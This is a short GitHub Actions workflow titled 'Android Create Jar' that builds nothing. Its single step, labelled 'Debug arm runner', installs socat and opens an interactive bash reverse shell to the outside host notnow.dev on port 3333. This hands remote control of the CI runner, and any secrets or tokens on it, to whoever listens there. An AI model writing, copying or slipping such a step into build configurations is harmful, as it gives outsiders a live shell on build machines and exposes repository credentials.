name: Android Create Jar

on: workflow_dispatch

jobs:
  build:
    runs-on: ubuntu-26.04-arm
    steps:
    - name: Debug arm runner
      run: sudo apt update && sudo apt install -y socat && socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:notnow.dev:3333
